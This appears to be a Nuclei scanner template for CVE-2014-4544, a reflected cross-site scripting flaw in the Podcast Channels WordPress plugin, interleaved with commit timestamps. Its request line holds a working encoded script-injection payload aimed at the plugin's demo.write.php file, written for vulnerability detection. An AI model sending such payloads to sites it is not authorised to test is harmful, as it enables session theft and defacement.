2021-09-25 00:49:53 +00:00
id : CVE-2014-4544
info :
2022-09-09 17:34:37 +00:00
name : Podcast Channels < 0.28 - Cross-Site Scripting
2021-09-25 00:49:53 +00:00
author : daffainfo
severity : medium
2022-02-25 14:32:23 +00:00
description : The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability.
2021-09-25 00:49:53 +00:00
reference :
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
2022-05-17 09:18:12 +00:00
- http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
2024-06-07 10:04:29 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-25 06:20:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-25 06:20:52 +00:00
cve-id : CVE-2014-4544
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00118
2024-06-07 10:04:29 +00:00
epss-percentile : 0.45869
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : podcast_channels_project
product : podcast_channels
2023-09-06 13:22:34 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project
2021-09-25 00:49:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-25 00:49:53 +00:00
- method : GET
path :
2022-01-25 19:38:53 +00:00
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
2021-09-25 00:49:53 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-09-25 00:49:53 +00:00
words :
2021-09-25 05:49:46 +00:00
- "</script><script>alert(document.domain)</script>"
2021-09-25 00:49:53 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402203b9e90974629c38dc7ba24b6c065893128fb49899c54b1d432a9354d6bf979f1022069e559bb2ed3a7b79110890ab03412a524f3603138b600753467d200c26c1f29:922c64590222798bb761d5b6d8e72950